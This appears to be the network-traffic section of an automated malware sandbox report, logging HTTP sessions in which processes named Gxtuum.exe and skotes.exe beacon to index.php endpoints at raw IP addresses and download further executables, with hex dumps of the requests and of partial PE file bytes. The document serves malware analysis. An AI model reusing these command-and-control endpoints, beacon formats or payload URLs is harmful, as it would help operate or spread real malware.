                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414495945 CET2472OUTData Raw: 00 d3 c2 5c 33 b9 77 40 16 f9 e1 66 a4 32 b0 40 d1 f5 0c 72 6f 06 e0 89 57 ae f1 50 e9 d1 5a eb d0 8a 68 ec f5 f8 94 b5 21 78 ff d0 3b 71 b4 41 ce 13 d9 84 d7 21 34 14 b0 b0 6f 3e 3c 2a 45 0b 99 9b aa af 18 52 8f 48 08 ce d0 66 fa df 5e d7 be 9a
                                                                                                                                                                                                                                                              Data Ascii: \3w@f2@roWPZh!x;qA!4o><*ERHf^h=CKD3SNp{lvC0U75E'5+EqtzU,1"+x]7)\qv!@'P!+pZ{++;ukS'4EM8G
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414565086 CET4944OUTData Raw: e5 ad 24 f0 17 44 99 fb 10 11 34 8a 1f ad cf ab 53 01 37 f2 28 d0 da 41 7f 44 55 2f 0b 58 a3 37 e0 44 83 85 5b 5a c5 62 24 7d 20 27 26 d1 ac 48 52 99 42 e5 64 92 1d 10 5b 6f a5 c4 07 d6 a1 ad 49 6c 72 03 7d c5 26 ac ec 65 8f 47 1c 78 81 e1 1b aa
                                                                                                                                                                                                                                                              Data Ascii: $D4S7(ADU/X7D[Zb$} '&HRBd[oIlr}&eGx,`e~>[cX.i*tzn\.X.4i{DFzmXN"Mggl9YT<40Ht^{[}\8hTh4sz~+cOxZ_
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414659023 CET4944OUTData Raw: e4 1c 3e 48 c6 cb 0c ea 09 f8 5c 22 7d d6 fa bc bb 2a 1b fe 82 32 4b ef 1e aa 32 32 57 92 e5 1a 27 41 87 ca 9a 90 9b bd f0 79 23 7b 6f 73 08 95 61 27 31 11 36 99 05 97 e7 97 3c 0c 14 62 aa 88 b7 56 2a b0 eb de 2a 1c bc 42 fd db cc 49 50 b8 03 a6
                                                                                                                                                                                                                                                              Data Ascii: >H\"}*2K22W'Ay#{osa'16<bV**BIP%[M>@VARVF|rP!BV JB^Z/C%A432t6POr*1<;0.`YAs~|TGvt;138{/J%SS|!G[hp_#{I{$
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414746046 CET4944OUTData Raw: c9 cf 31 0f 2a 76 7f 38 15 ba af e3 39 b9 69 2a e1 e2 86 b9 a3 1a cb 9d 93 75 63 85 96 6b 76 08 74 08 b4 24 93 d0 29 4b 13 93 ee 38 18 b6 38 7e 01 1d 07 18 c3 62 fd 52 dc 89 66 b5 35 29 0d 08 e7 89 bb ca aa 8c 78 c6 15 32 fb a0 73 fb ed 2c c4 2e
                                                                                                                                                                                                                                                              Data Ascii: 1*v89i*uckvt$)K88~bRf5)x2s,.14iFv8leZYEl'n-9+8xGIOKUcz+]>S <o!G.j=Y`_=d=G=7tUPi $j0y1DOHmIPq
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.534012079 CET2472OUTData Raw: 48 b9 86 bb d2 d1 c5 f7 02 97 70 5b 9c 67 33 db 5a b5 0b a5 ab b6 55 f8 10 ce 9e 2f 18 45 71 5a 1d 47 85 26 86 aa 42 7d d9 b1 a6 cb 6d f4 5f 7e 87 bf da 11 c9 66 bb 2c 9d 23 f3 d8 96 5b 86 d5 e0 4b 9f 37 52 43 b7 67 a4 88 87 85 b5 fa 37 1d 69 3e
                                                                                                                                                                                                                                                              Data Ascii: Hp[g3ZU/EqZG&B}m_~f,#[K7RCg7i>LD 8g1/_W=^IL\}+L@v6SXB0BAGt-3#%A[\rz%`?e?UwdcVg-u""X817FhxF8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.534066916 CET2472OUTData Raw: e5 2f f7 f4 23 97 a3 99 2a fe 64 95 c6 f6 53 7c b5 e2 b8 df 9a 57 a4 94 20 5e 63 b3 f8 7c c1 05 cc f2 49 ac 06 77 be f7 b6 5c e5 99 68 e4 af 14 70 f2 d1 ec b0 b6 84 13 ec e1 c0 18 cc 5b 75 a0 e8 ea ce 54 13 7e b1 40 ad 40 04 a8 0f 98 81 a7 54 69
                                                                                                                                                                                                                                                              Data Ascii: /#*dS|W ^c|Iw\hp[uT~@@TikDA$kB^Rz(AcY;]WmwS\?k2k3)c@5Lj>UrkSm'3[}\hl|aaX^0G8P``]9/-gb-*
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.534173965 CET4944OUTData Raw: c1 aa 18 4c e7 ea d1 35 ad fa 80 b4 85 cf 5e 92 60 16 41 cf 0b d3 fe 83 1c b7 50 8e e3 99 16 af 81 18 c1 db 83 4a 1b e1 62 3c b8 d6 82 0b f3 dc 11 92 de 83 cb ff 33 9c 12 ed fa a6 07 d4 29 cc 48 25 42 7b a5 15 12 ba e5 9d bf a0 ae a2 66 06 23 d1
                                                                                                                                                                                                                                                              Data Ascii: L5^`APJb<3)H%B{f#$dL\9^bh53|%bc-$C8G{`+{r*I;:WKBQp$mq&p8o31ivZ6]ObnsN|:Gl*ai.*_RU
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:42.055047989 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 2
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                              X-RateLimit-Remaining: 28
                                                                                                                                                                                                                                                              X-RateLimit-Reset: 1734832059
                                                                                                                                                                                                                                                              ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                                                                                                                              Data Ascii: OK


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              43192.168.2.450018212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:41.404232979 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:42.713399887 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:42 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              44192.168.2.450024185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:43.329495907 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019809001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:44.671525955 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              45192.168.2.450025212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:44.504565001 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:45.817074060 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:45 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              46192.168.2.450026185.215.113.16802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:44.966159105 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221056938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:45 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2955776
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:18:56 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675af0-2d1a00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 50 00 00 04 00 00 0a 06 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(PP@P.@M$a$$ $h@.rsrc$x@.idata $z@syphqzjl+$v+|@tdmszgwn@P,@.taggant0PP",@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221126080 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221165895 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221501112 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221537113 CET1236INData Raw: 4f 12 67 50 91 ca 81 ed 51 d7 c2 64 5f 8f 25 0e 0d ab e9 03 91 87 30 d4 38 8f 61 33 2d 0b 5a ff 20 49 52 e6 10 41 4a 0e 6c e5 3c 92 72 71 28 e0 88 6f 3a e4 84 ff 29 20 5d 8f 1d bd f7 a0 11 ad 4d 93 05 bc 45 0d 5a e4 4f b7 2d 3c 35 af e9 e4 12 70
                                                                                                                                                                                                                                                              Data Ascii: OgPQd_%08a3-Z IRAJl<rq(o:) ]MEZO-<5pw_|SjD & 3z,TTad/=S,#/FGJOMdhPHO9l2e )itq(y}DM3<0"
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221571922 CET1236INData Raw: 23 67 28 a8 2e 7f 5e ed 4d 90 6c 41 b9 c4 be 55 82 a7 a5 9d 1f 6f f5 d4 d7 6e 05 78 1e 9f 98 b5 c4 e9 ea a2 15 ee c8 14 74 e2 01 66 e9 e6 e9 0f 3c 22 eb 7e f6 c6 84 14 18 2a f0 cd 7f 91 37 57 d5 d8 26 84 95 fe ea 32 7d 00 28 5f 5d ef e9 50 9e 8e
                                                                                                                                                                                                                                                              Data Ascii: #g(.^MlAUonxtf<"~*7W&2}(_]Pjd`~1UR,\vXC]eYj+q|wPR~N9*wD##86R[D"M`1[L'r%2I'kzE-Gdkzfca{%y+:9F"h%L\Le
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.221615076 CET1236INData Raw: 4e da 51 50 23 07 03 7c 95 99 ef dc 1d a8 a2 ce 22 2b f3 63 4e f8 d9 e9 5e c9 99 dd d0 8f 05 6c 65 69 ff 71 d6 d7 b1 e2 e8 0b 04 e4 98 cc ad 25 1b 75 70 e5 14 a7 75 00 7e 9b 94 e9 ee 4b fa eb 56 af f7 df c8 f8 09 69 23 51 3a 04 23 97 31 50 39 10
                                                                                                                                                                                                                                                              Data Ascii: NQP#|"+cN^leiq%upu~KVi#Q:#1P9*SU#eRPj#=N^P#3H&@&#doo~xW.)0$q!X{E:k`h4M#pVz/lgZ?&/g-IL
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.222107887 CET1236INData Raw: 14 c2 f7 08 af b3 c9 58 96 2e ea e7 af 0e ce 16 5d 9d f1 2f 95 18 2d d1 15 f7 e9 e1 8c cc 41 d4 7a 02 83 53 1d 98 21 e5 b0 0b 24 e0 35 e9 52 e0 c4 9d 02 98 15 9f 6c 5c 59 1b 4b f4 ec 9d 23 c8 1e 37 6f f5 42 e2 e9 e3 39 24 0a 2e 5d db 52 ec b0 c9
                                                                                                                                                                                                                                                              Data Ascii: X.]/-AzS!$5Rl\YK#7oB9$.]R1#eMOU#aM>*l<&]T=/)QLW'6fmqO$AX LlydzH.]+YJQTU1^'!T#oi
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.222146034 CET1224INData Raw: f0 90 a2 5a 1f dc f2 df 50 35 e6 e1 1c c3 25 78 95 cf 20 16 e4 8f 09 08 a1 bb f7 ec b0 9c 0a 53 97 c7 f7 db 5c 0b ba 59 55 9a 2a d1 80 e7 fe e1 ad 8f fd 55 97 84 ec 52 d6 0c 51 3c 17 a0 59 27 ad a0 26 b0 1f 24 62 51 23 0f 2a fb 98 1b b0 e2 94 17
                                                                                                                                                                                                                                                              Data Ascii: ZP5%x S\YU*URQ<Y'&$bQ#*&d/d''5]'{UO)2(K&Tb-jyW2SSJ%>8!PVu4iU=Ok%Z(*\6."oO#e? Ol8&%YR]C(SGf!<8m#K
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.222182989 CET1236INData Raw: 58 9d f1 2b 97 eb 23 dc 28 1a ec a8 81 9d f1 4f 91 83 6d 11 13 89 88 4a 35 1b fb 0d a9 98 5d 56 1f 74 e3 fd 1a 2b 66 e2 bc a9 d9 4e 3c 5e e3 64 d9 43 23 dd 6c 14 e6 51 44 9c f7 b3 ce 88 13 0c e1 0b 0e a8 2f db 66 0e b8 a9 f7 af 1e 73 ea b3 ae c9
                                                                                                                                                                                                                                                              Data Ascii: X+#(OmJ5]Vt+fN<^dC#lQD/fsvL#.T1kK!hM/HG3\"$1'4"Ot-h6=4/L#%q'r*7&Y`P#Q$MPO:&S[cd#ih0K88h{u
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:46.340903997 CET1236INData Raw: 2b 98 ed 93 91 cb 39 3e 94 9b 04 ba 2d 91 47 a3 fb e0 fc 23 29 59 70 1f 57 df 69 19 5e 3b 2e ea 38 dd b8 ba 97 b5 00 90 a2 bd 03 20 1a a6 f5 21 9a 75 03 db 51 fd 12 0a fb 5d 31 ba 1e 78 02 96 65 a5 45 9c 5d 1d 03 f0 21 0c fe 53 49 6b 96 1e 9b c8
                                                                                                                                                                                                                                                              Data Ascii: +9>-G#)YpWi^;.8 !uQ]1xeE]!SIk.Edqx)Rwp7gIWjGIhT8F1hD_y7j@n?o=a5Ik2u"3n!8S4


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              47192.168.2.450039212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:48.813936949 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:49.674402952 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:49 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              48192.168.2.450051212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:51.766829967 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:53.063509941 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:52 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              49192.168.2.450061185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:54.509139061 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019810001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:55.833525896 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              50192.168.2.450067212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:55.047255993 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:56.353044033 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:56 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              51192.168.2.450069185.215.113.16802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:56.138953924 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454093933 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:56 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 965120
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:16:25 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675a59-eba00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a 5a 67 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 0a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELJZgg"w@lD@@@d|@Nu4@.text `.rdata@@.datalpH@.rsrcN@P@@.relocuvD@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454159021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
